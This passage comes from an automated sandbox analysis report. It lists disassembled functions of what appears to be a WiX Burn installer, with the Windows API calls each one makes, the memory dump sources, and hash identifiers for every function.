                                                                                                                                                                    • CompareStringW.KERNELBASE(0000007F,00001000,?,000000FF,version.dll,000000FF,?,?,00000000,00906595,00906595,?,0090563D,?,?,00000000), ref: 009056E5
                                                                                                                                                                    • GetLastError.KERNEL32(?,0090563D,?,?,00000000,?,?,00906595,?,00907F02,?,?,?,?,?), ref: 00905714
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CompareErrorLastString
                                                                                                                                                                    • String ID: Failed to compare strings.$variable.cpp$version.dll
                                                                                                                                                                    • API String ID: 1733990998-4228644734
                                                                                                                                                                    • Opcode ID: 32e1e8e4ecdada2c341866069153a280de24bf8604c8e4211fbec2367fe0c170
                                                                                                                                                                    • Instruction ID: fa738ae90efb060e3cab2ee51c1f9bb4362655de87ef2c2c8632107cbf3f6007
                                                                                                                                                                    • Opcode Fuzzy Hash: 32e1e8e4ecdada2c341866069153a280de24bf8604c8e4211fbec2367fe0c170
                                                                                                                                                                    • Instruction Fuzzy Hash: A0210736645915EFC7108F98CD44E5ABBA8EB45730B220319E924EB3D0E670DE01AA90
                                                                                                                                                                    Function 00940A28 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 56synchronizationCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • WaitForSingleObject.KERNEL32(000000FF,?,00000000,?,?,00904F1C,?,000000FF,?,?,?,?,?,00000000,?,?), ref: 00940A38
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,00904F1C,?,000000FF,?,?,?,?,?,00000000,?,?,?,?,?), ref: 00940A46
                                                                                                                                                                    • GetExitCodeProcess.KERNELBASE(000000FF,?), ref: 00940A8B
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,00904F1C,?,000000FF,?,?,?,?,?,00000000,?,?,?,?,?), ref: 00940A95
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorLast$CodeExitObjectProcessSingleWait
                                                                                                                                                                    • String ID: procutil.cpp
                                                                                                                                                                    • API String ID: 590199018-1178289305
                                                                                                                                                                    • Opcode ID: 527ec9f569da932de1b99b5049cb57cf2e670e9762715c816e43890f65e715ef
                                                                                                                                                                    • Instruction ID: 0f721eb9bbcf115c621b5535d532dd891d0c44226251ec0591dd2c7805ac8a8e
                                                                                                                                                                    • Opcode Fuzzy Hash: 527ec9f569da932de1b99b5049cb57cf2e670e9762715c816e43890f65e715ef
                                                                                                                                                                    • Instruction Fuzzy Hash: C611E537D15335EBC7208B94890DE9E7AA8EF44760F124255FF54AB280D274CD009AD0
                                                                                                                                                                    Function 009209EA Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 54fileCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 0092140C: SetFilePointerEx.KERNELBASE(?,?,?,00000000,00000000,?,?,?,00000000,?,00920A19,?,?,?), ref: 00921434
                                                                                                                                                                      • Part of subcall function 0092140C: GetLastError.KERNEL32(?,00920A19,?,?,?), ref: 0092143E
                                                                                                                                                                    • ReadFile.KERNELBASE(?,?,?,?,00000000,?,?,?), ref: 00920A27
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00920A31
                                                                                                                                                                    Strings
                                                                                                                                                                    • cabextract.cpp, xrefs: 00920A55
                                                                                                                                                                    • Failed to read during cabinet extraction., xrefs: 00920A5F
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorFileLast$PointerRead
                                                                                                                                                                    • String ID: Failed to read during cabinet extraction.$cabextract.cpp
                                                                                                                                                                    • API String ID: 2170121939-2426083571
                                                                                                                                                                    • Opcode ID: 45082d6cf224c2cfbfcbfcac1432546ced788437f37e299378f8dd5c9f7e37db
                                                                                                                                                                    • Instruction ID: 5488826b1fc33dd7b361b15d841b0d4268b77a2e02e7693e630ffcc17f1947c1
                                                                                                                                                                    • Opcode Fuzzy Hash: 45082d6cf224c2cfbfcbfcac1432546ced788437f37e299378f8dd5c9f7e37db
                                                                                                                                                                    • Instruction Fuzzy Hash: C911E136A00279BBCB219F95EC08E9E7F68FF89760B014255FE04A7291C730D910DBD0
                                                                                                                                                                    Function 0092140C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 47COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • SetFilePointerEx.KERNELBASE(?,?,?,00000000,00000000,?,?,?,00000000,?,00920A19,?,?,?), ref: 00921434
                                                                                                                                                                    • GetLastError.KERNEL32(?,00920A19,?,?,?), ref: 0092143E
                                                                                                                                                                    Strings
                                                                                                                                                                    • Failed to move to virtual file pointer., xrefs: 0092146C
                                                                                                                                                                    • cabextract.cpp, xrefs: 00921462
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorFileLastPointer
                                                                                                                                                                    • String ID: Failed to move to virtual file pointer.$cabextract.cpp
                                                                                                                                                                    • API String ID: 2976181284-3005670968
                                                                                                                                                                    • Opcode ID: 13de41245ddec9ccbf6739f1c8a8137e7898f0f45263f3c6c6f213b0383d0fa0
                                                                                                                                                                    • Instruction ID: a5dee7d8d32aca604782e53c2b5c9693219e1ba6c32770777d23a2d79ef76f32
                                                                                                                                                                    • Opcode Fuzzy Hash: 13de41245ddec9ccbf6739f1c8a8137e7898f0f45263f3c6c6f213b0383d0fa0
                                                                                                                                                                    • Instruction Fuzzy Hash: 0001A73754063977C7215A96AC09E8BBF19EF507B17118125FD2C56151D731DC20D7D4
                                                                                                                                                                    Function 00943EDD Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • ReadFile.KERNELBASE(?,?,00000000,?,00000000), ref: 00943F73
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00943FD6
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorFileLastRead
                                                                                                                                                                    • String ID: fileutil.cpp
                                                                                                                                                                    • API String ID: 1948546556-2967768451
                                                                                                                                                                    • Opcode ID: 9016b62a7f52d09d725546b49f083d62ed87f682cc5b30b726ed96280a769518
                                                                                                                                                                    • Instruction ID: 9e275b17f8ebc51ce172312ea5e691b4d29a8f18c0b332b63971bd0087d9af4b
                                                                                                                                                                    • Opcode Fuzzy Hash: 9016b62a7f52d09d725546b49f083d62ed87f682cc5b30b726ed96280a769518
                                                                                                                                                                    • Instruction Fuzzy Hash: 63318F71E002699BEB25CE25C840FDA77B8FB44751F0080EAFE48E7240D7B49EC89B94
                                                                                                                                                                    Function 00944E3A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45fileCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • WriteFile.KERNELBASE(00000000,00000000,00000000,?,00000000,00000000,00000000,?,?,?,00943F9A,?,?,?), ref: 00944E5E
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,00943F9A,?,?,?), ref: 00944E68
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorFileLastWrite
                                                                                                                                                                    • String ID: fileutil.cpp
                                                                                                                                                                    • API String ID: 442123175-2967768451
                                                                                                                                                                    • Opcode ID: 9f50d7389652055d613c7074df695043e2143098d771087e161930b537b61fd2
                                                                                                                                                                    • Instruction ID: a1b7624f57832ee7b6443774766b5b2bc64116b46edec51bb3b074ab323bb288
                                                                                                                                                                    • Opcode Fuzzy Hash: 9f50d7389652055d613c7074df695043e2143098d771087e161930b537b61fd2
                                                                                                                                                                    • Instruction Fuzzy Hash: 85F06933A00229ABCB208E9ADC45FEFBB6DFB45761F014225FD04E7140E731AE1096E0
                                                                                                                                                                    Function 0094490D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • SetFilePointerEx.KERNELBASE(?,?,?,?,?,00000000,?,?,?,00918770,00000000,00000000,00000000,00000000,00000000), ref: 00944925
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,00918770,00000000,00000000,00000000,00000000,00000000), ref: 0094492F
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorFileLastPointer
                                                                                                                                                                    • String ID: fileutil.cpp
                                                                                                                                                                    • API String ID: 2976181284-2967768451
                                                                                                                                                                    • Opcode ID: bcfeb8438f05a970b657a31e5453f502a299f2b47871296b5c2643c72a5d11e6
                                                                                                                                                                    • Instruction ID: 893e0e1949c9c67a9606351f48ee084ed02dba15e63a996baa3f3fb9a258a2bd
                                                                                                                                                                    • Opcode Fuzzy Hash: bcfeb8438f05a970b657a31e5453f502a299f2b47871296b5c2643c72a5d11e6
                                                                                                                                                                    • Instruction Fuzzy Hash: E2F08176A04129ABDB208F95DC09EAB7FA8EF05B60B014154BD54AB250E731DC10EBE0
                                                                                                                                                                    Function 00903838 Relevance: 4.6, APIs: 3, Instructions: 80libraryCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00903877
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00903881
                                                                                                                                                                    • LoadLibraryW.KERNELBASE(?,?,00000104,?), ref: 009038EA
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: DirectoryErrorLastLibraryLoadSystem
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1230559179-0
                                                                                                                                                                    • Opcode ID: bd74d1806c3a2fe0c1f86d64b3f4e7e10c994b05092d8b5e9d54d9f6bd6e3363
                                                                                                                                                                    • Instruction ID: f9537cc1a595bd5a02f72f8206e6907ab3dfe262028f7c1563a1b6024a4cc92c
                                                                                                                                                                    • Opcode Fuzzy Hash: bd74d1806c3a2fe0c1f86d64b3f4e7e10c994b05092d8b5e9d54d9f6bd6e3363
                                                                                                                                                                    • Instruction Fuzzy Hash: 3B2107B6D0133DBFDB209B659C49F9AB7AC9B44710F1185A5FE14E7281DA70DE408BD0
                                                                                                                                                                    Function 00903A16 Relevance: 4.5, APIs: 3, Instructions: 21memoryCOMMONLIBRARYCODE
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000,00000000,?,00903BB6,00000000,?,00901474,00000000,80004005,00000000,80004005,00000000,000001C7,?,009013B8), ref: 00903A20
                                                                                                                                                                    • RtlFreeHeap.NTDLL(00000000,?,00903BB6,00000000,?,00901474,00000000,80004005,00000000,80004005,00000000,000001C7,?,009013B8,000001C7,00000100), ref: 00903A27
                                                                                                                                                                    • GetLastError.KERNEL32(?,00903BB6,00000000,?,00901474,00000000,80004005,00000000,80004005,00000000,000001C7,?,009013B8,000001C7,00000100,?), ref: 00903A31
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Heap$ErrorFreeLastProcess
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 406640338-0
                                                                                                                                                                    • Opcode ID: ff8aecf132aea2e1c67e8ad52356335365dbd46ce6a32c0fdb32c5e02bf2ca0e
                                                                                                                                                                    • Instruction ID: a54d750c44eba242e11deca1aa2d5c7d8df68377fd4766cf8d26e51a7d12e012
                                                                                                                                                                    • Opcode Fuzzy Hash: ff8aecf132aea2e1c67e8ad52356335365dbd46ce6a32c0fdb32c5e02bf2ca0e
                                                                                                                                                                    • Instruction Fuzzy Hash: C0D01277A181395B872117EA5C5CD5B7F5CEF06BA27014121FE44D6260D725CD00A6E4
                                                                                                                                                                    Function 00940F6C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42registryCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,00000000,00000001,0096AAA0,00000000,?,009457E1,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000), ref: 00940F80
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Open
                                                                                                                                                                    • String ID: regutil.cpp
                                                                                                                                                                    • API String ID: 71445658-955085611
                                                                                                                                                                    • Opcode ID: 6ae0dba38477afece1617481de767b7ed508ed10d23572bb5b8892fdebdd5e93
                                                                                                                                                                    • Instruction ID: a8da6860f99850d4c7438b25f8457d2113bb6c0239f069a47175c431283e1560
                                                                                                                                                                    • Opcode Fuzzy Hash: 6ae0dba38477afece1617481de767b7ed508ed10d23572bb5b8892fdebdd5e93
                                                                                                                                                                    • Instruction Fuzzy Hash: B5F08B336011367B8B3005568C05F6FBE5DEBC07B0F1585B5BF46AE250E2718C00A6F0
                                                                                                                                                                    Function 0093F49A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0093F491
                                                                                                                                                                      • Part of subcall function 0094998C: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00949A09
                                                                                                                                                                      • Part of subcall function 0094998C: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00949A1A
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                    • String ID: PA9n
                                                                                                                                                                    • API String ID: 1269201914-1067447980
                                                                                                                                                                    • Opcode ID: 692dbcc41cf3e66cc6066d30401fef48abda9718cacf78ede78732ebd7ed1ef7
                                                                                                                                                                    • Instruction ID: 0f26b6b7a0f7c2185e96bb06aeaca45603f2083f54021c0f9f33ffd3539c27da
                                                                                                                                                                    • Opcode Fuzzy Hash: 692dbcc41cf3e66cc6066d30401fef48abda9718cacf78ede78732ebd7ed1ef7
                                                                                                                                                                    • Instruction Fuzzy Hash: 62B012A12795016E325491141D2BD37024CC2C5FB1330466EF000C1060E8464C050832
                                                                                                                                                                    Function 0093F4AA Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0093F491
                                                                                                                                                                      • Part of subcall function 0094998C: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00949A09
                                                                                                                                                                      • Part of subcall function 0094998C: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00949A1A
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                    • String ID: PA9n
                                                                                                                                                                    • API String ID: 1269201914-1067447980
                                                                                                                                                                    • Opcode ID: a44daa55f747345d8417c8675a7de2f8b6519abb47920ff5124dbe293ac90920
                                                                                                                                                                    • Instruction ID: 8b9d382faa70b182998f151042a6dfe969cd07e8d3d0ea20eab2be9d1801681a
                                                                                                                                                                    • Opcode Fuzzy Hash: a44daa55f747345d8417c8675a7de2f8b6519abb47920ff5124dbe293ac90920
                                                                                                                                                                    • Instruction Fuzzy Hash: B8B012A12796016D325891141C2AD37024CC2C5FB1330876EF000C1060E8414C440432
                                                                                                                                                                    Function 0093F479 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0093F491
                                                                                                                                                                      • Part of subcall function 0094998C: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00949A09
                                                                                                                                                                      • Part of subcall function 0094998C: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00949A1A
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                    • String ID: PA9n
                                                                                                                                                                    • API String ID: 1269201914-1067447980
                                                                                                                                                                    • Opcode ID: c2a58facd204f60f0f214c94cdb857d7956c62dda8ebf53515be7841ac055541
                                                                                                                                                                    • Instruction ID: fd37abb28de68c5a5a2e10dd0cea63db65718beea04bba63cf0c9790626d9d82
                                                                                                                                                                    • Opcode Fuzzy Hash: c2a58facd204f60f0f214c94cdb857d7956c62dda8ebf53515be7841ac055541
                                                                                                                                                                    • Instruction Fuzzy Hash: 99B012A52795017D321451101C2AC37020CC2C1FB1330C76EF400D0060A8415C080432
                                                                                                                                                                    Function 009435C3 Relevance: 1.6, APIs: 1, Instructions: 101COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • VariantInit.OLEAUT32(?), ref: 009435F8
                                                                                                                                                                      • Part of subcall function 0094304F: GetModuleHandleA.KERNEL32(kernel32.dll,00000000,00000000,00943609,00000000,?,00000000), ref: 00943069
                                                                                                                                                                      • Part of subcall function 0094304F: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,0092C025,?,00905405,?,00000000,?), ref: 00943075
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorHandleInitLastModuleVariant
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 52713655-0
                                                                                                                                                                    • Opcode ID: 5973c2c0716ef4e42af46cbec46a010749d1061084e83c238a6a5b1421e32c78
                                                                                                                                                                    • Instruction ID: 08fe7bf75dad9af3ecee23a96757010d4f225e4aae6ad61de4a580fd96276468
                                                                                                                                                                    • Opcode Fuzzy Hash: 5973c2c0716ef4e42af46cbec46a010749d1061084e83c238a6a5b1421e32c78
                                                                                                                                                                    • Instruction Fuzzy Hash: 64312F76D01229ABCB11DFA9C885ADEB7F8EF08710F02856AED15BB311D6759D008BA4
                                                                                                                                                                    Function 00945870 Relevance: 1.6, APIs: 1, Instructions: 60registryCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • RegCloseKey.ADVAPI32(80070490,00000000,80070490,0096AAA0,00000000,80070490,?,?,00918B19,WiX\Burn,PackageCache,00000000,0096AAA0,00000000,00000000,80070490), ref: 009458CA
